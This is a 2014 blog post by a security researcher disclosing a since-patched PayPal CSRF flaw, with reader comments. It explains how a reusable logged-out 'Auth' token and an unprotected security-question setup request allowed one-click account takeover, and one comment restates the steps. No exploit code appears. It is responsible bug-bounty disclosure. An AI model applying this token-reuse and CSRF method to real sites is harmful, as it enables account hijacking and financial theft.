2014
10.09

Today I am going to publicly disclose  a critical vulnerability I have found during my research in PayPal, This vulnerability enabled me to completely bypass the CSRF Prevention System implemented by PayPal, The vulnerability is patched very fast and PayPal paid me the maximum bounty they give ;).

1- Reusable CSRF Token:

The CSRF token “that authenticate every single request made by the user” which can be also found in the request body of every request with the parameter name “Auth” get changed with every request made by user for security measures, but after a deep investigation I found out that the CSRF Auth is Reusable for that specific user email address or username, this means If an attacker found any of these CSRF Tokens, He can then make actions in the behalf of any logged in user.
Hmm, it seems interesting but still not exploitable, as there is no way for an attacker to get the “Auth” value from a victim session.

2- Bypassing the CSRF Auth System:

The CSRF Auth verifies every single request of that user, So what If an attacker “not logged in” tries to make a “send money” request then PayPal will ask the attacker to provide his email and password, The attacker will provide the “Victim Email” and ANY password, Then he will capture the request, The request will contain a Valid CSRF Auth token Which is Reusable and Can authorise this specific user requests. Upon Further Investigation, We have found out that an Attacker can obtain the CSRF Auth which can be valid for ALL users, by intercepting the POST request from a page that provide an Auth Token before the Logging-in process, check this page for the magical CSRF Auth “https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money”. At this point the attacker Can CSRF “almost” any request on behalf of this user.

The application generates a valid "Auth" token for a logged-out user!

The application generates a valid “Auth” token for a logged-out user!

Through examination of the password change process, I have found that an attacker can NOT Change the victim password without answering the Security Questions set by user, Also the user himself can NOT change the security questions without entering the password!

3- ByPassing the Security Questions Change:

Screen Shot 2014-08-13 at 12.20.52 AM

The initial process of “setting” security questions is not password protected and is reusable

After further investigation, I have noticed that the request of setting up the security questions “which is initiated by the user while signing up” is not password-protected, and it can be reused to reset the security questions up without providing the password, hence, Armed with the CSRF Auth, an attacker can CSRF this process too and change the victim’s Security questions.

At this point, An attacker can conduct a targeted CSRF attack against PayPal users and take a full control over their accounts. Hence, An attacker can CSRF all the requests including but not limited to:

1- Add/Remove/Confirm Email address
2-Add fully privileged users to business account
3- Change Security questions
4- Change Billing/Shipping Address
5- Change Payment methods
6- Change user settings(Notifications/Mobile settings) ………… and more.
To automate the whole process, I have coded a Python interactive server to demonstrate how an attacker can exploit this vulnerability in a real-life scenario attack.

Here is the POC Video:

 

 

Update #1 (Dec 4th 2014):

PayPal spokesperson released the following statement:

“One of our security researchers recently made us aware of a potential way to bypass PayPal’s Cross-Site Request Forgery (CSRF) Protection Authorization System when logging onto PayPal.com. Through the PayPal Bug Bounty program, the researcher reported this to us first and our team worked quickly to fix this potential vulnerability before any of our customers were affected by this issue. We proactively work with security researchers to learn about and stay ahead of potential threats because the security of our customers’ accounts is our top concern.” 

Update #2 (Dec 31st 2014)”

Made the 3rd Rank in Top Ethical Hackers of 2014 , CheckMarx Company

Update #3 (March 20th 2015):

This technique has been listed on the ( TOP 10 Web Hacking techniques of 2014) with the rank #6.

100 comments so far

Add Your Comment
  1. […] Egyptian security researcher, Yasser H. Ali has reported three critical vulnerabilities in PayPal website that could be exploited by an attacker to […]

  2. How much did you get? Saying you got the max and then not saying how much is it sounds a bit unfair 🙂

  3. Yeah tell us !

    • 10,000 USD 🙂

      • MSA , congrats bro i hope you the best ISA

  4. […] researcher Yasser Ali has publicly disclosed a vulnerability in PayPal’s website. Ali claims he was able to hijack anyone’s account […]

  5. Hi Yasser,

    I don’t really understand the part about visiting yasserali.com:8080/w3pwn

    What information is being captured in that XXS request? Was that necessary just for adding another email address, or password reset or both? Can I say that if the user didn’t click on the link, this attack is rather difficult to reproduce?

    Brendan

    • CSRF attack needs a user interaction, in this attack the victim has to click on the link, that’s it, regarding the Auth-Token, the attacker could get a valid Auth-Token from any request happens when the in an anonymous session.

      • Thanks for the explanation. Can I access the python script code?

  6. Is the auth in the HTTP_REFERER?

  7. How much was the bounty? That’s what we really want to know 🙂

    • 10,000.00 USD 🙂

  8. Hi Yasser Ali, Can you make a better video, IE Zoom on those commands ETC? Or even Speech? Thanks for you’re time, And lovely hack.

  9. Yasser Ali, I cant see what you are typing ETC.

    • Set the video quality to 1080px

  10. Hi Yaseer,
    Any possibility of sharing the python code ? 😛

    Nice one, congrats 🙂

  11. Holy hell you must be one happy camper with $10k USD.

    Tell us about yourself, what do you do? Age?

    • I am 28, I do security consultation 🙂

  12. Actually they paid the mudslime in falafel vouchers 🙂 Bug ruining douche.

  13. Hi, I am very impressed by your achievement. It would be nice if you can share me how you learnt your skill in Information Security. I mean which books or websites?

  14. When did you report this and how many days did they take to fix it?

  15. I honestly think you deserve more. Some services offer up to 1 million for those who discover vulnerabilities in their security. This vulnerability wasn’t a Gmail, iCloud or SnapChat one, it was on an online banking/money transfer site. The consequences could have been huge and purely financial to the company.

  16. Really this was a nice catch… Congrats Yasser bro (y) 😀

  17. […] researcher Yasser Ali has publicly disclosed a vulnerability in PayPal’s website. Ali claims he was able to hijack anyone’s account […]

  18. That was nice!! How long did it take for you to do all this ?

    • I got the idea while walking in the street, Then It takes some hours to bypass the security questions and write the Python Script.

  19. So there were two main issues:
    1. You was be able to get universal (for all users) CSRF-token from _send-money form
    2. There were no password protection for adding mail and changing questions

    Is it correct?

    • yes, but there was a password protection on the “changing questions”, but I have bypassed this by calling the “set”questions function instead of calling the “Reset” questions function and successfully overwrote the already set questions ;), clear now?

      • Yes, thanks! Good job:)

  20. السلام عليكم,
    كيفك علي؟
    كاتبين مقالة عن مدونتك على موقع سوفتبيديا, رابط المقالة:
    http://news.softpedia.com/news/Critical-PayPal-Bug-Left-All-Accounts-Vulnerable-to-Hijacking-466500.shtml

  21. May I copied your clip and add some explanation in Thai? I will link back to original clip.

    • Go ahead, share knowledge 🙂

  22. Hi Yaser,

    Excelennet ctach

    What baffles me however that connection with paypal site is not SSL protected!!!!
    If it was your hack would be impossible to realise… Or i am missing something?

    • It is SSL protected bro!

  23. Hi Yasser,

    I’ve been to fast to post my previous comment, but now i’m baffled even more!!!
    Paypal DO use SSL…. So i’m at loss how you managing to get the plaintext of the session?

    • I am intercepting my own traffic using burpsuite, Where is the problem?

  24. […] The computer security industry has made many positive changes since the early days of computing. One thing that seems to be catching on with bigger tech companies is bug bounty programs. PayPal offers such a program and [Yasser] decided to throw his hat in the ring and see if he could find any juicy vulnerabilities. His curiosity paid off big time. […]

  25. […] The computer security industry has made many positive changes since the early days of computing. One thing that seems to be catching on with bigger tech companies is bug bounty programs. PayPal offers such a program and [Yasser] decided to throw his hat in the ring and see if he could find any juicy vulnerabilities. His curiosity paid off big time. […]

  26. I have detected one such CSRF payload that has the potential to CSRF all Paypal functions. Paypal is presently working on that issue. Not sure how much they are going to pay me for that.Could you please tell how many days did they take to fix that issue for yours? What categorization had they assigned to that issue? For me they categorized that as CSRF though, it is not a normal CSRF.

    • Hi Yasser,

      did you get a chance to look at my comment?

      Amlan

      • yes I have talked to you on Facebook and you didn’t respond, DM on twitter

        • I guess, you have contacted wrong Amlan. My twitter ID @whitesec1211 🙂

          Thanks

  27. Sorry Yasser,
    I’m not really pentest expert… but browsing thru burpsuite docs i’m trying to understand how it works in you case. I suppose that you’ve installed burp CA certificate into the trust chain of your browser, and thew burp proxy tool generated for you a certificate for http://www.paypal.com for it’s MITM functionality… Am i right? If so it seems to me that an attacker who is trying to intercept traffic from another’s person browser will have much bigger challenge before him as he will have to BREAK the SSL encryption without the help
    of cooperating browser. Or i am missing something else?

    P.S. I’m not trying to criticise your achievement, it is pretty brilliant work IMO

    • Vadim, it’s not a man in the middle attack but a CSRF attack. If you’re not familiar with CSRF you can look up the wikipedia article, it explains the basics pretty well. The TL;DR is that you trick the user into sending the right http request to paypal’s website by e.g. making them click a link or load an “image”.

      • Hi Michal,
        Thanks you for the pointer, i’we brought myself up to date about CSRF attacks, so to summarize:
        I attempt an unsuccesful login to paypal using victims’s credentials,
        while using burp to decode the traffic and recover auth token.
        Than i trick user to send an https request (email/password change for example) to the paypal with the auth
        token i collected?

    • Michal made it clear, A hacker doesn’t need to be MITM, Go to OWASP and read about the CSRF attack

  28. […] investigador de seguridad egipcio, Yasser H. Ali, ha demostrado el hackeo a PayPal con un simple clic, aprovechando una vulnerabilidad crítica que podía haber puesto en peligro a 156 millones de […]

  29. Hi Yasser,

    Few clarifications about this issue. Is it like
    1. You navigated to the page https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money
    2. try to transfer money
    3. Paypal asks for credential
    4. Let’s say, you provided [email protected](victim email) and a wrong password (as you dont know victim’s password)
    5. You captured the auth token in Burp Suite and forwarded the authentication request(which ofcourse will fail as the password was wrong) But the auth token used in this request can now be reused for victim id [email protected]
    6. You created a CSRF payload with the captured auth token and sent that to [email protected] as a targeted attack
    7. If the user bearing paypal id [email protected], when logged into Paypal, clicks on the link sent by you, fall victim to your trap.

    Am I correct?

    Best
    Amlan

    • Yes right, but you don’t have to enter or know the victim email to capture the Auth Token, you can just enter any random value, No need for victim email.

  30. […] The computer security industry has made many positive changes since the early days of computing. One thing that seems to be catching on with bigger tech companies is bug bounty programs. PayPal offers such a program and [Yasser] decided to throw his hat in the ring and see if he could find any juicy vulnerabilities. His curiosity paid off big time. […]

  31. […] researcher Yasser Ali has publicly disclosed a vulnerability in PayPal’s website. Ali claims he was able to hijack anyone’s account in a […]

  32. […] said in a blog post that the “critical vulnerability” meant an attacker could hijack any PayPal user […]

  33. A think that I didn’t understand from your clip is about the python script.

    As my understanding, when victim visit a trap, then the vimtim is a person to send information, am I right? so, the script is just like a tunnel to let attracker pass needed information to let victim browser send a request to Paypal as what attacker want.

    So, request send to Paypal doesn’t use the difference session, the attacker use vimtim session with given token pass though the tunnel. right? are you be able to provide script to get more understanding?

    PS. I have put your content here https://www.youtube.com/watch?v=kmPqMUkFkHg

    • The attacker can generate a CSRF which is valid for everybody, The python script is just for automating the process and making the exploit powerful, I have seen your video, Amazing 😉

  34. […] affecting more than 156 millions PayPal users. An Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and Resetting […]

  35. […] más de 156 millones de usuarios de PayPal. Un investigador de seguridad egipcia, Yasser Ali H. ha descubierto  tres vulnerabilidades críticas en el sitio web de PayPal incluyendo CSRF , Aut derivación token […]

  36. […] Major, account-hijacking PayPal XSS, but it’s fixed – Yasserali Blog […]

  37. […] Major, account-hijacking PayPal XSS, but it’s fixed – Yasserali Blog […]

  38. […] affecting more than 156 millions PayPal users. An Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and Resetting […]

  39. […] researcher Yasser Ali is on the good side, but he still has released details of a vulnerability that shows how easy it […]

  40. […] posted his findings on his blogpost explaining that the hack was possible with just one click as it required hackers trying to access a […]

  41. I do believe that I have been hacked. Pay Pal and E-bay have both denied this but I have a zero bank balance. Right here at Christmas. No one can seem to help me especially not the “big” conglomerates that ignore the problems and “deny,deny,deny. I will proceed with whatever means that ae available to me. Now that I have been robbed by these “hackers” and no money left for presents , its a sad sad thing. Huum I have no choice bu tto move forward …thanks for letting me vent.
    To you all.. Have a great Christmas!
    (oh btw) first time I had ever ordered on e-bay.

    • I think you have been a victim of a scam not hacking, you should never give-up, follow up with your issue until you get all your rights back.

  42. […] PayPal n’a pas tardé à répondre à cette alerte. Correction effectuée, Ali a touché 10 000 dollars de récompense. La faille se situait du côté des jetons d’authentification. Ces codes sont envoyés aux clients et sont changés à chaque fois que l’utilisateur clique sur le lien Paypal. Ali a cependant identifié que chaque jeton peut être réutilisé en faisant croire à Paypal que le client « cliqueur » est bien le propriétaire du compte en question. (Ali) […]

  43. […] detailed how the vulnerability could be exploited, in a blog. The essential problem lies with the fact that CSRF Auth verifies every single request of that […]

  44. the hijacked money actually is mine.can u plz resend me back.

    • ha ha waiting for approval ../ good. can i get your Facebook id?

      • Contact me on twitter and I will DM you my Facebook

    • ok I will 😀

  45. […] investigador de seguridad egipcio, Yasser H. Ali, ha demostrado el hackeo a PayPal con un simple clic, aprovechando una vulnerabilidad crítica que podía haber puesto en peligro a 156 millones de […]

  46. […] find an issue with the logic of the code and use it to conduct an attack. For e.g, Yasser ali demonstrated how he was able to hijack a paypal account with just a single click. So we can surely expect an […]

  47. Dear Yasser,
    May I please have the source to your python program to help me learn more about information security, i know that it doesn’t work but I just want to look at the source

  48. […] find an issue with the logic of the code and use it to conduct an attack. For e.g, Yasser ali demonstrated how he was able to hijack a paypal account with just a single click. So we can surely expect an […]

  49. […] Belkin Buffer Overflow via Web 25. Google User De-Anonymization 26. Soaksoak WordPress Malware 27. Hacking PayPal Accounts with 1 Click 28. Same Origin Bypass in Adobe Reader […]

  50. […] Major, account-hijacking PayPal XSS, but it’s fixed – Yasserali Blog […]

  51. Hi Yasser…i am a newbie also and i want to learn…can you provide the source code please??…want to research …

    • The source code has nothing to do with research!

  52. what tools did you use? sorry noobie, still learning

    • Just burp proxy 🙂

  53. […] Yesser H. Ali, egipatski istraživač računalne sigurnosti, pronašao je tri velike ranjivosti u servisu za plaćanje – PayPal, među kojima je i XSRF (Cross-site request forgery). Radi se o izuzetno opasnom propustu, s obzirom da pomoću njega napadač svoju email adresu može registrirati na žrtvin PayPal račun ukoliko ona klikne na maliciozan HTML link. U ovom slučaju ne pomažu ni sigurnosna pitanja, jer ranjivost napadaču omogućuje zaobilaženje pitanja i direktno resetiranje lozinke. Koliko je ovaj način hakiranja računa jednostavan pokazao je i sam Yesser na svojem blogu, a video možete vidjeti ovdje: http://yasserali.com/hacking-paypal-accounts-with-one-click/ […]

  54. […] запросов). Эту уязвимость он подробно описал в своем блоге, мы перевели и адаптировали пост с описанием […]

  55. […] Hacking PayPal Accounts with 1 Click […]

  56. Is the vuln still active? A lot of hackings regarding paypal this month.

  57. كيف يا هندسه

  58. can i add money to my paypal

    • Nope, PayPal is secure

  59. Brilliant, loved it 😀

  60. I think you entered an invalid Email ( in text input >>from email) …….@yahuauyaaa.net
    But to Whom this Token as it isn`t a valid Email !!!!!?

    • This was a Valid-For-All token, a token which not associated with any session, so it will be valid for any session!

  61. hey bro dont hack mine i aslo connected wid us pls

  62. nice

  63. hi video link please give

    • I have uploaded a new video, kindly refresh the page

  64. […] Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and […]

  65. nice work bro…congratsss 🙂

  66. GreaT 😀

    #RESPECT

    I’m Trying Since 3month Nothing HAPPENED 🙂